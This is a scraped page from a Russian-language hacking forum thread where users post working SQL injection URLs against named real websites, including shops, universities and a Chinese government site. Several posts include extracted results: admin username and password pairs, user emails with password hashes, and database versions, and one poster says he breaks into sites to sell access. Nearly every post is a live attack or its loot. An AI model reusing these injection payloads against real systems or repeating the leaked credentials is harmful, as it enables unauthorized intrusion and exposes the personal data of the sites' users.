ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5721  
Старый 15.06.2008, 12:04
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Polemika.com.ua
Цитата:
http://polemika.com.ua/index.php?action=image&image_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,password,email)+from+user+where+id=2--
вывод в txt файл..)

Последний раз редактировалось sabe; 15.06.2008 в 12:16..
 
Ответить с цитированием

  #5722  
Старый 15.06.2008, 12:13
Аватар для КВР
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию

да скуль
_http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,user(),3,4,version( ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25--
 
Ответить с цитированием

  #5723  
Старый 15.06.2008, 13:47
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://bootsus.bri-global.com/
Код:
http://bootsus.bri-global.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(admin_username+as+nvarchar)%2Bchar(58)%2Bcast(admin_password+as+nvarchar)+FROM+admin_users)--&sid=1&iid=198
http://www.theovalgroup.com/
Код:
http://www.theovalgroup.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=2477&pid=35763
http://www.davy.co.uk/
Код:
http://www.davy.co.uk/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=179&pid=43144
 
Ответить с цитированием

  #5724  
Старый 15.06.2008, 15:37
Аватар для Toxic
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279

Репутация: 25
Отправить сообщение для Toxic с помощью ICQ
По умолчанию

http://f1dvd.ru/index.php?p=gallerypic&img_id=-519+union+select+1,2,3,concat_ws(char(124),email,p ass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=45&area=1&ascdesc=desc&print=1

babara@mail.ru|563f311d2613a827c2d3897a024ddf74
51654

Любителям формулы 1 ))
 
Ответить с цитированием

  #5725  
Старый 15.06.2008, 15:54
Аватар для Imperou$
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

2 sabe
Пробей, file_priv как видишь нет, я б отписал. От админки без пассов толку нет, рута ведь туда не втулишь, я видел её. И про админку я спрашивал не на этом сайте Тот линк я к сожалению выложить не могу, слишком дорого мне выйдет.
Рут то на media.mit.edu по идее, т.к. media.mit.edu
и mit.edu на разных серваках и ипах,соответсвенно affect.media.mit.edu откуда стянули рута, это поддомен корня media.mit.edu на этом серваке, и рут по идее должен быть к нему, а не к mit.edu, сервы то разные... Но про это я писал выше, подразумевая целевой рут.
Да в принципе я и ломал не для новостей, а сеошникам\скупщикам загнать как еду пиаристую. Как видишь всё корыстно .
 
Ответить с цитированием

  #5726  
Старый 15.06.2008, 16:02
Аватар для z1k
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

еси найдете чота интересное делитесь впечатлениями
Код:
http://tusbuscadores.com/notiprensa/display.php?ID=-8077+union+select+1,2,vers ion(),4,5,6,7, 8,9/*
Код:
http://www.xpg.us/cerebra/display.php?id=-574+uni on+se lect+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
Код:
http://www.rayner.com/products.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9/*
Код:
http://www.naturalaquario.com/products.php?id=-2+union+select+1,version()/*
Код:
http://www.nnovia.com/products.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25/*
 
Ответить с цитированием

  #5727  
Старый 15.06.2008, 16:15
Аватар для LUKAC
LUKAC
Новичок
Регистрация: 19.08.2007
Сообщений: 18
Провел на форуме:
182410

Репутация: 8
По умолчанию

Цитата:
http://www.mks-ks.ru/shop/cat.php?id=-1127+union+select+1,2,3,version()/*
Цитата:
http://www.wekashop.de/index.php?id=-14+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3, 4,5,6,7,8,9,0/*
Цитата:
user - 82 -limit
name password - columns
http://www.schuetzenbund.de/shop/list.php?id=-21'+union+select+1,concat_ws(char(58),name,passwor d),3,4,5,6,7,8,9+from+user/*
admin:sh00ting
никакого картона.

Последний раз редактировалось Grey; 15.06.2008 в 18:11..
 
Ответить с цитированием

  #5728  
Старый 15.06.2008, 16:29
Аватар для Fata1ex
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Кардинг запрещен на форуме.

Чет давно нигде не копалсо )
Цитата:
http://www.zucc.edu.cn/zucc_list.php?id=-37+union+select+1,2,3,4,5,6/*
Цитата:
http://news.tsinghua.edu.cn/eng__news.php?id=-1582+order+by+12/*
Цитата:
http://www.cdht.gov.cn/govopen/detail.php?id=9691+union+select+1/*
Цитата:
http://www.cec-ceda.org.cn/rdht/comment.php?cid=-12+union+select+1,2,3,4/*
Крутить ничто не стал. Смотрите - будет что интересное - отписывайтесь )



[+]
Цитата:
http://www.emeraldinsight.com.cn/journal.php?id=-98+union+select+1,2,3,4,5,concat_ws(0x3a,id,user,p wd),concat_ws(0x3a,user(),version(),database()),8, 9,10,11,12,13,14+from+users/*
2:dreaming:7bcde95b0707ae0f93aa6ec76745cf02
436948db@localhost:5.0.27:436948db

Последний раз редактировалось Fata1ex; 15.06.2008 в 16:49..
 
Ответить с цитированием

  #5729  
Старый 15.06.2008, 21:59
Аватар для Toxic
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279

Репутация: 25
Отправить сообщение для Toxic с помощью ICQ
По умолчанию

http://boking.ru/index.php?p=gallerypic&img_id=-65+union+select+1,2,3,concat_ws(char(124),email,pa ss),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=2&area=1&ascdesc=desc


http://boking.ru/admin/

ringo admin@ringo.ru

Если хорошо поискать можете и шел найти если кому надо
 
Ответить с цитированием

  #5730  
Старый 15.06.2008, 22:58
Аватар для LUKAC
LUKAC
Новичок
Регистрация: 19.08.2007
Сообщений: 18
Провел на форуме:
182410

Репутация: 8
По умолчанию

https://shop.invictusnetworks.com/detail.php?id=-16008+union+select+1,version(),3,4,5,6,7,8,9,0,1,2/*
http://www.bigshoebazaar.com/showprod.php?prcd=2422+union+select+table_name+fro m+information_schema.tables/*

есчё 2 шопа
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ